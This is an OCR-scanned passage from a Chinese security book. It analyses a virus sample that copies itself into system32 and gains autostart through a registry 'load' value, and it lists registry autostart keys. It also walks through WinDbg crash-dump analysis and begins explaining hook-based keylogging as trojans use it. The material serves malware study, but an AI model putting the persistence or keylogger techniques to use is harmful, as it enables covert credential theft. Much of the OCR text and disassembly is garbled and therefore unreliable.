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程序 ， 若 打开 /创建 程序 成 功 便 调用 RegSetValueExA 对 该 键 值 进行 修改 。 随 后 继续 出 现 一 
个 条 件 跳 转 语句 ， 也 就 是 对 于 键 值 是 否 修改 成 功 进行 判断 ， 如 果 修 改 失 败 则 返回 error 然 后 
退出 程序 ; 如 果 修 改 成 功 则 调用 RegCloseKey 关 闭 句柄 ， 如 图 9-57 所 示 。 


ds:RegsetyalueExA 
test eax, eax 

pop edi 

j Short loc 481874 


















am 
push esi 
push offset aErrorNoRegsetu ; "error no RegSetUalueEx $sVn" 
call — sub h681hD8 
add esp, 8 

esi 





loc 501875: 

mov eax, [espei«lpSubKey] 
push eax ; hkey| 
call ^ ds:RegCloseKey 

pop esi 









sub 481088 endp 








图 9-57 ”注册 表 过 程 (2 ) 
查阅 MSDN， 从 源码 上 分 析 这 三 个 函数 。 


LONG WINAPI RegCreateKeyEx( 


HKEY hKey, //WKEY: 注册 表 根 键 

LPCTSTR lpSubKey, // 打 开 或 创建 键 值 

DWORD dwReserved, // 参 数 必须 设 为 0 

LPTSTR lpClass, // 用 户 定义 的 类 , 可 以 设 为 NULL 

DWORD dwOptions, // 功 能 选择 

REGSAM samDesired, // 访 问 权限 

CONST LPSECURITY ATTRIBUTES lpsecurityAttributes，// 安 全 属性 
PHKEY phkResult, // 用 来 接收 打开 /创建 键 值 的 句柄 
LPDWORD phkResult // 装 载 变量 


); 


第 1 个 参数 hKey 的 值 往往 是 注册 表 根 键 其 中 之 一 ， 注 册 表 根 键 为 以 下 5 个 。 

> HKEY USERS: 保存 计算 机 所 有 用 户 的 信息 ， 包 括 登 录 计 算 机 账号 及 密码 。 
> HEKY CLASSES _ ROOT: 保存 文件 类 型 的 信息 。 

> HEKY_CURRENT_USER: 保存 当前 系统 的 用 户 信息 。 

> HEKY CURRENT CONFIG: 保存 当前 用 户 的 系统 配置 信息 。 

> HEKY LOCAL MACHINE: 保存 计算 机 硬件 信息 ， 包 括 远程 计算 机 访问 的 键 值 。 
由 开启 远程 桌面 “3389” 功 能 确定 : 

第 1 个 参数 设置 肯定 为 排列 在 末尾 的 HEKY LOCAL MACHINE. 

第 2 个 参数 jpSubKey 则 设置 为 之 前 Regshot 快 照 中 被 修改 的 注册 表 键 值 的 地 址 。 
第 3 个 参数 dwReserved 设 置 为 0。 

第 4 个 参数 lpClass 若 用 户 没 有 定义 类 ， 则 设 NULL。 
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第 5 个 参数 4gWOptions 设 置 为 REG OPTION BACKUP RESTORE, REG OPTION_ 
CREATE LINK. REG OPTION NON VOLATILE、 REG OPTION VOLATILE 之 一 ， 
其 中 常用 的 为 REG_OPTION_NON_VOLATILE: 信息 保留 在 文件 中 ， 重 启 之 后 仍然 被 保 
存 。REG_OPTION_VOLATILE 信 息 保留 在 内 存 中 ， 重 启 之 后 失去 效果 。 

第 6 个 参数 samDesired， 一 般 均 为 KEY_ALL ACCESS， 也 就 是 允许 所 有 操作 。 

第 7 个 参数 lpSecurityAttributes 指 向 的 句柄 无 继承 则 设置 为 NULL。 

第 8 个 参数 phkResult 可 以 指向 定义 任意 一 个 根 键 的 地 址 ， 用 于 被 其 他 注册 表 函 数 使 
用 ， 如 定义 HKEY hKEY， 则 参数 设置 为 &hKey。 

最 后 一 个 参数 为 REG_CREATED NEW KEY ( 若 子 键 存在 则 打开 ， 不 存在 则 创建 ) 
或 者 REG_ OPENED EXISTING KEY ( 当 且 仅 当 子 键 存在 时 打开 ) 。 

当 RegCreateKeyEx 创 建 或 者 打开 一 个 子 键 值 后 ， 接 下 来 就 是 调用 RegSetValueEx 对 其 


键 值 进行 修改 。 
LONG RegSetValueEx( 

HKEY hKey, // 根 键 
LPCWSTR lpValueName, // 将 要 修改 的 键 值 名 称 
DWORD Reserved, // 设 置 为 0 
DWORD dwType, // 键 值 的 数据 类 型 
CONST BYTE* lpData, // 指 向 读 写 键 值 的 缓冲 区 
DWORD cbData // 缓 存 区 大 小 


|р; 


本 例 中 的 参数 一 hKey 就 被 设置 为 RegCreateKeyEx 中 的 phkResult 的 参数 HKEY。 参 数 一 
得 到 了 将 要 修改 键 值 的 详细 地 址 ， 因 此 参数 二 lpValueName 只 用 设置 为 键 值 的 键 名 。 参 数 
四 dwType 通 常设 置 为 REG_DWORD (用 于 修改 双 字 类 型 ) 或 者 REG_SZ (用 于 修改 字符 
串 类 型 ，SZ (string zero) 表示 null 结 尾 的 字符 串 ) 。 参 数 五 jpData 设 置 为 指向 包含 数据 缓 
冲 区 《〈 修 改 键 值 的 目标 值 ) 的 指针 。 参 数 六 cbData 可 以 通过 strlen 函 数 /size of 函数 分 别 得 出 
类 型 为 字符 串 / 双 字 的 缓冲 区 的 大 小 。 

有 关注 册 表 的 最 后 一 个 函数 RegCloseKey 则 非常 简单 。 


LONG RegCloseKey( 
HKEY ҺКеу 
// 设 置 为 之 前 由 RegCreateKeyEx 返 回 的 参数 phkResult, 这 里 设置 为 hKey 

); 
该 病毒 最 后 一 个 功能 就 是 将 自身 复制 进入 系统 目录 ， 通 过 修改 注册 表 HKEY _ 
CURRENT USERNWSoftware\Microsoft\Windows NT\CurrentVersion\Windows， 修 改 load 键 
值 进行 开机 自 启 。 通 过 修改 注册 表 进行 自 启 的 方法 还 有 以 下 几 种 : 

HKEY LOCAL MACHINE software Microsoft WindowsNT CurrentVersion Winlogon! 
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Userinit 键 值 下 通常 是 userinitexe， QE S THIS) 目标 程序 。 
HKEY CURRENT USER Software Microsoft Windows CurrentVersion Policies Explorer! 
Run 
HKEY LOCAL MACHINE Software Microsoft Windows CurrentVersion Policies Explorer 
Run 
HKEY CURRENT USER Software Microsoft Windows CurrentVersion RunServicesOnce 
HKEY CURRENT USER Software Microsoft Windows CurrentVersion RunOnce Setup 
HKEY LOCAL MACHINE Software Microsoft Windows CurrentVersion RunOnce Setup 
HKEY LOCAL MACHINE Software Microsoft Windows CurrentVersion RunOnce 
HKEY CURRENT USER Software Microsoft Windows CurrentVersion RunOnce 
HKEY LOCAL MACHINE Software Microsoft Windows CurrentVersion RunOnceEx 
( Windows XP) 
HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Run 
HKEY LOCAL MACHINE Software Microsoft Windows CurrentVersion Run 
HKEY CURRENT USER Software Microsoft Windows NT CurrentVersion Winlogon 
HKEY LOCAL MACHINE Software Microsoft Windows NT CurrentVersion Winlogon 
单 击 左下 角 的 “菜单 ”按钮 ， 在 运行 对 话 框 中 输入 regedit， 找 到 HEKY_CURRENT _USER\ 
Software\Microsoft\Windows NT\CurrentVersion\Windows 可 知 “33.exe” 被 复制 到 系统 目录 
system32 下 〈 见 图 9-58) ， 并 且 通 过 修改 load 键 值 ， 进 行 自 启 ， 如 图 9-59 所 示 。 





D AB1180 proc near 


|Filenames byte ptr -2394h 
|purrer- byte ptr -200һ 


гата uh esp, зван 
eax, Tespy39whvBuffer] 
ebx 








arm ms sh esi 
Са amu s] uo REG SZ TAFE sh edi 
RTE [mn эт C: NITIDO V ey tes22\29. exe sh 2090h i usize 
б тл — sh ea ; lpBufFer 
sasana ї1 — üs:Getsystembirectorun 
erne! v edi, offset unk_40700C 
z —À вех, @FFFFFFFFh 





r l eax 
mamgo: edx, [espe31gbvpufrer] 












[cvwmmorsvaysteaevsa exe 
edi, ecx 
sh — 18h ;nsize 
в. u esi, edi 
к u свк, ecx 
» u edi, 
А ecx, OrFFFFFFFD 
sun 'epne scasb 
= C rrotected Storage Sys u sex, ebx 
S Phamabosk c edi 
tegas ecx, 2 


ве в Д 
vEDDDDODDEDDODDDDDDPEPP 














BET ae souci 
Schedulet 1 ecx, ерх 
5 Sox; Гета 
5 ЕЦ eax š; ipFilenane 
ss SES 
сат еа ; Module 
е 1 dsitetmeoulerilehumen 
са ea edx, [espea1ansrilename] 
M ; занем ehane 
i 6 1 1pexistingFileNand 
ii dsitopyrilen 
» cd 
图 9-58 regedit 图 9-59 ”注册 表 自 启 (1) 


— 29 一 一 


EN 黑客 与 安全 技术 指南 


接 下 来 通过 IDA Pro 图 形 模式 分 析 该 过 程 。 
进入 Imports 界 面 定位 到 CopyFile， 随 后 使 用 Xref (Ctrl+X 组 合 键 ) 跳 转 到 如 图 9-60 所 
示 的 图 形 界面 。 


lea еск, [espe318heBuFFer] 
push 1 ; bFaillfExists 









lea edx, [esp*31uh«Filename] 
push ecx ; lpHewFileName 
push edx ; 1pExistingFileNane 






call ^ ds:CopyFilen 
edi 


pop © esi 
eax, eax 


ebx 
Short loc 401218 
























EPE 
lea вах, [esp+30hh+BUFFer] 
push вах ; lpData 
push offset UalueNane ; "load" 
push offset SubKey — ; “SoftwareVMhicrosoi ftV Windows NTWCurren"... 
push — 80000001n ; hkey 
call sub 401000 
esp, 10h 








retn 
sub_401180 endp 


图 9-60 注册 表 自 启 (2) 

首先 ， 程 序 调用 GetSystemDirectoryA 函 数 ， 通 过 该 函数 得 出 系统 目录 ， 也 就 是 
system32 的 位 置 所 在 (系统 盘 不 一 定 都 在 C 盘 〉。 

其 次 ， 使 用 GetModuleFileNameA 函 数 ， 该 函数 的 作用 是 得 到 文件 的 完整 路 径 ， 联 系 
下 文 紧 接着 调用 CopyFileA 函 数 ， 可 以 得 知 ，GetModuleFileNameA 函 数 的 目的 是 得 到 “33. 
exe” 的 具体 所 在 位 置 ， 然 后 通过 CopyFileA 函 数 复制 进 系统 目录 。 

最 后 ， 通 过 调用 注册 表 函 数 修改 load 键 值 ， 添 加 “33.exe” 进 行 注 册 表 自 启 ， 如 图 
9-60 所 示 。 

同样 通过 源码 进行 分 析 GetSystemDirectoryA 函 数 。 


UINT WINAPI GetSystemDirectory( 








out LPTSTR lpBuffer, // 装 载 系统 目录 的 缓冲 区 
_in UINT uSize // 缓 冲 区 大 小 
) 


使 用 起 来 则 很 简单 ， 也 就 是 先 建立 一 个 数组 用 来 充当 缓冲 区 (char ххх[256]) ， 随 后 
使 用 GetSystemDirectory(xxx,256)， 就 得 到 了 系统 目录 的 路 径 。 


DWORD WINAPI GetModuleFileName ( 
_In opt HMODULE hModule, // 模 板 句柄 , 设置 为 NOLL 时 返回 该 程 序 完整 路 径 
Out  LPTSTR lpFilename,  ”// 保 存 文件 路 径 缓冲 





54 
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In  DWORD nSize // 缓 冲 区 大 小 


); 


为 了 得 到 自身 的 完整 路 径 ， 第 1 个 参数 需要 设置 为 NULL， 后 两 个 参数 仍然 可 以 通过 
建立 一 个 数组 存放 路 径 ， 如 char sss[256]， 进 而 使 用 GetModuleFileName (NULL, sss, 
256) < 

得 到 了 系统 目录 和 自身 路 径 之 后 ， 调 用 CopyFile 函 数 将 自身 复制 进 系统 目录 。 


BOOL CopyFile( 


LPCTSTR lpExistingFileName, // 文 件 自身 路 径 
LPCTSTR lpNewFileName, // 文 件 目 的 路 径 
BOOL bFailIfExists // 对 相同 名 称 文件 操作 选项 


); 


第 3 个 参数 bFailIfExists， 布 尔 值 。 设 定 为 TRUE， 表 示 若 文件 已 经 在 目的 路 径 存在 ， 
则 函数 失效 ， 设 定 为 FALSE， 则 覆盖 目标 文件 。 

由 此 ， 推 断 出 CopyFile (sss (病毒 自身 路 径 )，xxx( 系 统 目 录 路 径 )，FLASE)。 

最 后 ， 调 用 注册 表 函 数 修改 键 值 。 

整个 病毒 的 分 析 到 此 结束 ， 病 毒 看 起 来 无 非 也 就 是 各 种 函数 的 “ 连 招 组 合 ” 喷 了 。 病 
毒 并 不 神秘 ， 只 是 需要 人 们 拥有 一 颗 敢 于 探索 、 无 旦 困难 的 心 ! 


9.2.6 ”使 用 WinDbg 进 行 蓝 屏 dmp 文 件 分 析 


在 Windows 平 台 下 ，WinDbg 是 一 款 强 大 的 用 户 态 和 内 核 态 的 调试 工具 ， 图 9-61 是 32 位 
WinDbg 的 主 界面 。 


E winDbg:6.12.0002.633 x86 
Ele Edt Vew Debug Window Чер 











图 9-61 32 位 (x86 ) WinDbg 主 界面 
安装 完成 后 ， 执 行 File 一 Symbol File Path 命 令 ， 在 Symbol File Path 对 话 框 中 设置 
Symbol Path 为 SRV*c: \symbol* http://msdl.microsoft.com/download/symbols, 如 图 9-62、 图 
9-63 所 示 ， 其 目的 就 是 下 载 WinDbg 所 需 的 符号 表 到 C 盘 的 sybol 文 件 夹 下 。 


= 
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Бе Edt View Debug Window Help 


Close Current Window [eu 








Open Executable... син 
Абас to a Process... Fé 
Open Crash Dump... Ctrl+D 
Connect to Remote Session... Ctrl+R 
Connect to Remote Stub. 
Kernel Debug... сик 
Symbol Fie Path ... CulsS 
Source File Раф... Сш+Р 
Image Не Рай... син 
Open Workspace... Ctiew 
Save Workspace 
purse >r. r | 
Delete Workspaces... Syrbei path 
Rr meri —— 3 
ve Workspace 
Cancel 
Map Network Drive. 
Disconnect Network Drive. вњ | 
Recent Fles 到 Browse... 
Ext Анка FREE 
图 9-62 符 表 设置 (1) 图 9-63 符号 表 设 置 (2) 


从 File 文 件 选项 ( 见 图 9-64) 中 可 以 看 到 ，WinDbg 可 以 调试 可 执行 文件 、 进 程 、DMP 
文件 ， 接 下 来 将 使 用 WinDbg 在 用 户 态 模式 调试 蓝屏 DMP 文 件 ， 进 而 分 析 造 成 蓝屏 的 原 
因 ， 用 到 的 命令 将 会 相应 地 做 出 解释 。 

使 用 组 合 键 CtrltD 或 者 执行 File 一 Open Crash Dump 命 令 ， 添 加 蓝屏 dmp 文 件 〈 也 可 以 
直接 拖 入 ) 。 弹 出 如 图 9-65 所 示 对 话 框 。 














Не Eit уен Debug Widow Нер Save information for workspace? 
Close Current Window. Ctr|+F4 [ Dont ask again in this WinDbg session 
Open Executable... Ctrl+E 
Attach to a Process... F6 No | Cancel | 





Open Crash Dump. 


图 9-64 File 菜单 图 9-65 ”工作 空间 
这 里 选择 No， 不 保留 工作 空间 ， 避 免 与 其 他 将 分 析 的 文件 冲突 。 
我 们 先 来 认识 图 9-66 中 信息 ， 首 先 : 
Microsoft (R) Windows Debugger Version 6.12.0002.633 X86 
Copyright (c) Microsoft Corporation. All rights reserved. 
这 两 名 表明 了 使 用 的 WinDbg 版 本 与 版 权 信息 。 


Executable search path is: Windows 7 Kernel Version 7601 (Service 
Pack 1) MP (4 procs) Free x64 

Product: WinNt, suite: TerminalServer SingleUserTS 

Built by: 7601.17944.amd64fre.win7spl gdr.120830-0333 


Machine Name: 
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Comaand - Duap C:\Documents and 5е1#іпєз\айвіп\ 8 1\112312-21949-01.4ар - Findbe Em | 器 网 


Microsoft (R) Windows Debugger Version 6.12.0002.633 186 
Copyright (с) Microsoft Corporation. ¿11 rights reserved 


[Loading Dump File [C:\Documents and Settingsvadwin'& m \112212-21949-01.8ар] 
Mini Kernel Dump File: Orly registers and stack trace аге available 


Synbol search path is: SRV*c:*symbols*http: //nsdl .xicrosoft.con/doznload/synbols 


WinNt, suite: TerminalServer SirgleUserTS 
Built by: 7601.17914.andé4fre. vin7spl чаг. 120830-0333 


Machine Name 

Kernel base = Oxffifft00'0481b000 PsloadedMcduleList + Oxfffff800'04a5f670 
Debug session time Fri Nov 23 13:44:08.182 2012 (UTC + 8:00) 

Systen Uptime: days 1:40:29.623 

Loading Kernel Symbols 


Press ctrl-c (cdb, kd, ntsd) or ctrl-bresk (windbg) to abort symbol loads that take too long 
Run sym noisy before .reloa to track down problexs loading symbols 


[Loading User Syabols 
[Loading unloaded module list 


9-66 ”DMP 文件 基础 信息 (1) 

以 上 代码 为 蓝屏 系统 的 基本 信息 ， 从 中 可 以 得 到 系统 的 版 本 为 64 位 的 Windows 7 系 
统 ， 处 理 器 核 数 为 4 (4 procs) o 

Kernel base 为 内 核 地 址 ，PsLoadedModuleList 为 Windows 加 载 的 所 有 内 核 模块 构成 的 链 
表 的 表 头 。 

从 Debug session time: Fri Nov 23 13: 44: 08.182 2012 (UTC + 8: 00) 信息 得 知 系 
统计 溃 发 生 的 具体 时 间 为 System Uptime: 0 days 1: 40: 29.623， 则 标明 系统 在 蓝屏 溃 前 
的 运行 时 长 。 

如 图 9-67 所 示 ， 从 Probably caused by : igdpmd64.sys ( igdpmd64+15aal8 ) 得 知 ， 系 
统 骨 省 的 原因 也 就 是 igdpmd64.sys 一 一 AMD 显 卡 驱动 文件 导致 的 。 


ттт 





> * 
| Bugcheck ànalysis * 
M * 


prae snae нннеее зз 
Use lanalvze -v to get detailed debugging information 

[BugCheck 50. (fffff8812bc5cb60, 0, fffff8800739fa18, 5) 

[Unable to load image ^SystenRoot*systen32^DRIVERS^igdpndé4.sys. Vin32 error 0n2 
=== WARNING: Unable to verify timestamp for igdpndé4.sys 

=== ERROR: Module load completed but symbols could not be loaded for igdpndé4.sys| 


[Could not read faulting driver name 
Probably caused by : igdpmdé4 sys ( igdpmd64+1Saa18 )| 








Followup: MachineOwner 





图 9-67 ”DMP 文件 基础 信息 (2) 
而 


Unable to load image \SystemRoot\system32\DRIVERS\igdpmd64.sys, Win32 
error On2*** WARNING: Unable to verify timestamp for igdpmd64.sys 
*** ERROR: Module load completed but symbols could not be loaded for 


igdpmd64.sys 


表示 无 法 找到 加 载 igdpmd64.sys 模 块 的 符号 表 。 
输入 !lanalyze-v 或 者 单 击 下 画 线 标记 的 命令 可 以 获得 具体 细节 ， 如 图 9-68 所 示 。 
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kd) lanalyze -v 
л ы 
* 
Bugcheck Analysis * 
* 
OBE 


AGE FAULT IN NONPAGED AREA (50) 
nvalid system hehory was referenced. This cannot be protected by try-except, 

t nust be protected by a Probe. Typically the address is just plain bed or it 

s pointing at freed memory 

rgunents 

rgl: fifff8812bcscbi0, memory referenced. 

rg2: 0000000000000000, value 0 = read operation, 1 = vr:te operation 

rg3: fifff8800739fa18, Ii non-zero, the instruction address vhich reíerenced the bad menory] 





address 
34: 00000010000000)5. (reserved) 
图 9-68 Bugcheck Analysis ( 1 ) 
PAGE FAULT IN NONPAGED AREA (50) 
Invalid system memory was referenced. This cannot be protected by try-except, 
it must be protected by a Probe. Typically the address is just plain bad or it 





is pointing at freed memory. 


这 段 代 码 为 WinDbg 分 析 蓝 屏 的 原因 : 无 效 系统 内 存 引用 ， 这 种 错误 不 能 被 try-except 
保护 ， 只 能 通过 Probe《〈 硬 件 侦 测 手段 》 来 保护 ， 最 典型 的 原因 是 地 址 引用 错误 ， 或 者 指 
向 一 个 已 释放 的 内 存 空间 。 


Arguments: // 蓝 屏 代码 
Argl: fffff8812bc5cb60, memory referenced. // 错 误 内 存 引 用 
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation. 
// 读 操作 引发 问题 
Arg3: fffff8800739fa18, If non-zero, the instruction address which 
referenced the bad memory address. // 非 0 标明 引用 错误 地 址 
Arg4: 0000000000000005, (reserved) // 预 留 信息 


软件 Bug 产 生 的 细节 如 图 9-69 所 示 。 


Боша not read faulting driver name 


READ ADDRESS: GetPointerFromàddress: unable to read from fffff80004ac9100 
£f£fff8812bcScbé0 


FauLTING IP 

lisdpndé4*152218 

F££££880'0739£a18 8b0408 nov eax.dvord ptr [rexercx] 
MM OINTERNAL CODE: 5 

"USTOMER CRASH COUNT: 1 

DEFAULT BUCKET ID: VISTA DRIVER FAULT 

BUGCHECK STR. 0x50 

PROCESS НАМЕ: csrss exe 

[usRENT таш. о 











图 9-69 Видсһеск Analysis (2 ) 
下 面 解释 了 蓝屏 代码 的 具体 原因 : 


Could not read faulting driver name // 无 法 读 出 驱动 名 称 
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READ ADDRESS: GetPointerFromAddress: unable to read from fffff80004ac9100 


fffff8812bc5cb60 


FAULTING IP: 


igdpmd64415aa18 


fffff880'0739fal8 800408 


PROCESS NAME: 


csrss.exe 


mov 


// 内 存 读 写 错误 , 对 应 Argl 


eax, dword ptr [гах+гсх] // 导 致 蓝屏 的 指令 


// 引 发 崩溃 的 用 户 层 程序 


图 9-70 存 放 的 是 在 发 生 崩 溃 时 寄存 器 存放 的 全 部 信息 。 





БАР FRAME 
OTE: The trap frane 
one register values 

£fff88007dceb60 
dx=f f f f fa800950eb50 
ip-fffff8800739fa18 
r8-0000000000000000 
11-0000000000000000 
14-0000000000000000 





fffff880051c49d0 — 


does not contain all 


registers 


may be zeroed or incorrect. 


rbx-0000000000000000 
1=1=0000000000000000 
rsp-fffff880051c4b60 
r3=f fff f880051c4b90 
r12=0000000000000000 
т15=0000000000000000 
еї pl nz па po nc 


nov 


esetting default scope 


AST, CONTROL TRANSFER 


rcx-0000000123e8e000 
rdi-0000000000000000 
rbp-fffffa8007452040 
r10-0000000000000001 
r13-0000000000000000 


eax,dword ptr [гах+гсх] ds:8ff8:fffff881'2bc5cb60-????????| 


from fffff800048408af to #####80004899#с0 








图 9-70 ”寄存 器 


-71、 图 9-72 存 放 的 则 是 STACK_TEXT， 即 栈 信息 ， 从 其 中 可 以 得 引发 崩溃 的 函数 。 


STACK. TEXT fffff880 051c49d0 ` nt!KeBugCheckEx 
“051c4868 “048408af 00000000'c0000001 : nt! ?7 ::ЕНОРОВЕМ::`5%гїпз'+0х437с1 
`051с4870 :048980ee : fffffa80`0950eb50 : nt1KiPageFault+0xl6e 
“051c49d0 “0739fal8 fffffa80'075b1000 : igdpmd64+0xl5aal8 
“051c4b60 `075b1000 : fffff880`091f4700 ; OxfffffaB0'075b1000 
“051c4b68 fffffa80`0950eb50 fffffa80`04f61298 ; 0xffftffa80`0950eb50 
1051с4Ь70 fffffa80'075b1000 : f£ffff880'073a1830 : Oxfffffa80' 075b1000 
051с4Ь78 fffffaBÜ'0950eb50 : fffffa80'08f78ff8 : Oxffffta80`0950eb50 
;051c4b80 fffffa80'075b1000 : fffff880'0739fe4c : OÜxfffffa80' 075b1000 
S OH КЕНДИ fffffa80`08f78fe8 : Oxfffff880'091£4700 
;05ic. a80: fffffa80`0950eb50 : Oxfffffa80`04f61298 
1051c4b38 fffff880`073a1830 : fffff880' 00000000 : igdpnd64«0x15c830 
051lc4ba0 fffffa80`08f78ff8 : ` “08f7 
Her Tira: fffffa80`00000001 : Oxfffffa80`08f78ff8 
0516458 s sic : fffffa80`0950eb50 : igdpnd64+0x1Sae4c 
051с4ЬЬ0 fffffa80`08f78fe8 ` * 

SOET К fffff880`0S1c4cb8 : Oxfffffa80`08f78fe9 
Ens EE TB fffffa80'08f791a8 : Üxfffffa8D 0950eb50 
ES fffffa80'08£79608 : 0xffftftf880`00000000 
`051с4Ьс8 fffffa80`00000001 : же x ` 
А * £ffffa80' 00000000 : Oxfffffa80`00000001 
051с4Ьа0 fffffa80'0950eb50 fffff ` ` 
озат Егтарр 0 Te | а80`075Ь1000 : 0xffttffta80`0950eb50 
*QBic4be0 fffffa80'08£791a8 fffffa80 00000000 : Oxfffff880'051c4cb8 
"QS1c4be8 fffffa80'D8f79608 ` fffffaB0'0950eb50 : Oxfffffa80'08£791a8 
"QBic4bf0 fffffaB0 00000000 : 00000119'00000000 ; OxfffffaB0' 08£79608 
"Q51c4bf8 fffffaBD'D75b1000 : 00000000'00000000 : OxfffffaB0 00000000 
“051c4c00 fffffa80 00000000 00000000'00000000 : Oxfffffa80 07551000 
“051c4c08 fffffaB0 0950еЬ50 00000000` 00000000 : Oxfffffa80 00000000 
"05lc4cl0 00000119'00000000 : 00000000' 00000000 : Oxfffffa80' 0950eb50 


fffff880' 051c4c18 





000000007 


00000000 : 


00000000 ` 00000000 





0x119" 00000000 





图 9-71 Stck 节 选 (1) 图 9-72 Stack 节选 (2) 
随后 则 显示 了 引发 蓝屏 的 驱动 信息 ， 包 括 驱 动 文 件 名 称 、 时 间 惟 等， 如 图 9-73 所 示 。 


FOLLOVUP NAME 
MODULE NAME: iqdpmd64 
IMAGE NAME 
DEBUG FIR IMAGE TIMESTAMP 
FAILURE BUCKET ID: X64 0x50 igdpnd64415aa18 
BUCKET ID: X64 0x50 ізірһ64+15аа18 


| 
Followup: MachineOwner 


图 9-73 ”驱动 信息 (1) 
单 击 图 9-73 中 下 画 线 标记 的 igdpmd64 或 者 输入 Imvm igdpmd64, 


MachineOvner 


igdpmd64 ,sys 
4d8d3eb7 


可 以 得 到 更 为 详细 
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的 驱动 信息 〈 见 图 9-74) 。 


1: kd lava igdpndé4 


end 
вао 07245000 ТРеғєвво: дшге act T (no =yabols) 


[рее path 


pmd64 sys 


`SystemRootsSysten32NDRIVERSNigdpad64 sys 


Image name: igdpmdé4.sys 


Tinestanp 
CheckSun 
InageSize 
Translations 


Sat Mar 26 09:17:43 2011 (4D8D3EB7) 
00BBA692 


00BB1BC0 
0000.04b0 0000.04e4 0409 04b0 0409.04e4 


图 9-74 ”驱动 信息 (2) 


图 9-74 中 列 出 了 驱动 文件 加 载 的 地 址 、 路 径 、 编 译 运行 的 时 间 戳 及 大 小 等 信息 。 

至 此 ， 本 次 使 用 WinDbg 蓝 屏 分 析 就 结束 了 。 除 软件 冲突 以 外 ， 有 些 病毒 也 会 引起 系 
统 骨 省， 造成 蓝屏 现象 。 在 C: \Windows\Minidump 文 件 夹 下 可 以 找到 相应 DMP 文 件 ， 或 
者 找到 C: \Windows\Memory.dmp 路 径 下 的 文件 ， 随 后 使 用 WinDbg 进 行 分 析 ， 找 到 病毒 相 


关 程 序 。 病 毒 引起 系统 崩溃 的 原因 ， 可 能 


载 驱动 、 修 改 内 核 、 隐 藏 程序 》。 


93 ”病毒 其 


是 其 对 内 核 进行 了 修改 操作 ， 也 就 是 Rootkit( 加 


他 常用 手段 介绍 





本 节 介绍 病毒 的 其 他 常用 手段 及 技术 ， 从 源 代码 方面 透彻 地 分 析 病 毒 种 种 神秘 的 功能 。 


9.3.1 键盘 记录 技术 


木马 病毒 的 盗号 功能 往往 利用 键盘 记录 技术 进行 ， 主 流 技术 就 是 利用 HOOK， 也 就 是 
钩子 《Windows 消 息 处 理 机 制 的 监视 点 ) ， 链 式 结构 ， 进 行 账号 密码 的 截获 。 截 获 方式 分 


为 全 局 消息 钩子 (截获 系统 中 所 有 进程 的 按键 消息 ) ， 局 部 消息 钧 子 ( 只 


当前 线程 的 按键 消息 ) 。 
1. 局 部 钩子 


E 记 录 特 定 程序 


首先 先 来 了 解 一 下 什么 是 局 部 消息 钩子 ， 局 部 消息 钩子 使 用 过 程 分 为 以 下 三 个 步骤 : 


(1) 安装 钩子 。 


SetWindowsHookEx 是 用 来 安装 钓 子 的 函数 ， 其 函数 原型 如 下 。 


HHOOK WINAPI SetWindowsHookEx( 


_Іп int idHook, 

_In HOOKPROC lpfn, 

In  HINSTANCE hMod, 

In DWORD dwThreadId 
); 


// 钩 子 类 型 

// 回 调 函数 地 址 

// 钩 子 指向 的 模板 句柄 
// 安 装 钩子 的 线程 ID 


第 1 个 参数 14Hook 用 于 设置 钩子 函数 截获 的 消息 类 型 ， 主 要 使 用 有 WH_ 
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CALLWNDPROC (使 用 SendMessage 发 送 消息 前 安装 钩子 ) . WH CALLWNDPROCRET 
(使 用 SendMessage 发 送 消息 后 安装 钩子 ) . МН GETMESSAGE 〈 调 用 PeekMessage 或 者 
SendMessage 后 安装 钩子 ) 、WH KEYBOARD (截获 WM _KEYUP 或 WM _KEYDOWN 时 
安装 钩子 ) 、WM_MOUSE (截获 鼠标 消息 时 安装 钩子 ) 。 

第 2 个 参数 ljpfo 则 会 设置 回调 函数 的 地 址 ， 也 就 是 接 下 来 第 2 步 设置 的 钩子 回调 函数 的 
地 址 。 

第 3 个 参数 hMod 在 局 部 消息 钩子 中 设置 为 NULL。 

第 4 个 参数 dwThreadId， 指 定 需要 安装 钩子 函数 的 线程 ID 。 这 里 可 以 先 使 用 
CreateToolhelp32Snapshot 函 数 快照 得 出 所 有 线程 ID 的 快照 ， 随 后 使 用 Process32First 以 及 
Process32Next 遍 历 线程 得 到 指定 程序 〈 可 以 通过 程序 名 ，“xx.exe”) 的 线程 ID。 也 可 以 
通过 FindWindowEx 找 到 程序 的 窗口 句柄 ， 然 后 通过 GetWindowThreadProcessId 的 返回 值得 
到 线程 ID。 目 前 很 多 程序 ， 例 如 QQ、YY 等 聊天 工具 均 用 GUI 绘图 制 得 ， 无 法 得 到 其 窗口 
句柄 ， 因 此 第 2 种 方法 失效 。 而 第 一 种 方法 ， 广 泛 流行 的 木马 病毒 并 不 是 针对 单一 程序 进 
行 盗号 ， 因 此 木马 病毒 通常 情况 下 会 使 用 全 局 钩子 。 

(2) 设置 钩子 函数 


LRESULT CALLBACK HOOKxxx // 名 称 自 定义 
( 


int nCode, // 钩 子 目的 代码 
WPARAM wParam, // 发 送 或 接受 消息 的 参数 
LPARAM 1Param // 发 送 或 接受 消息 的 参数 


j 
Í: 


… /对 于 各 种 消息 的 处 理 代 码 ， 如 将 接收 到 的 消息 通过 CreateFile、WriteFile 保 存在 某 
个 位 置 等 ， 如 监测 键盘 大 小 写 等 。 


return CallNextHookEx(....) 
// 钩 子 为 链 式 结构 , 故 需要 一 个 回调 函数 , 将 信息 从 钩子 间 相 互 传递 
} 


接着 详细 查看 一 下 CallNextHookEx 回 调 函数 的 作用 。 


LRESULT WINAPI CallNextHookEx( 





In opt  HHOOK hhk, // 由 安装 钩子 函数 返回 得 到 的 句柄 
EIS int nCode, // 同 HOOKxxx (因为 保存 了 要 传递 给 下 一 个 钩子 的 全 部 信 
息 , 所 以 下 面 的 参数 均 与 自身 钩子 函数 一 致 ) 
ame. WPARAM wParam, // 同 HOOKxxx 
тп. LPARAM lParam // 同 HOOKxxx 
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G) 卸载 钩子 
钩子 使 用 完毕 后 如 果 不 务 载 ， 则 会 占用 大 量 的 系统 资源 ， 使 得 系统 运行 缓慢 也 提高 了 
被 用 户 发 现 的 可 能 性 ， 因 此 需要 卸载 钩子 。 


BOOL WINAPI UnhookWindowsHookEx ( 
.In  HHOOK hhk // 由 安装 钩子 函数 返回 得 到 的 句柄 
); 


2. 全 局 钩子 


下 面 就 将 介绍 全 局 钩子 ， 与 局 部 钩子 不 同 的 是 ， 全 局 钩子 使 用 DLL 文件 加 载 函数 。 分 
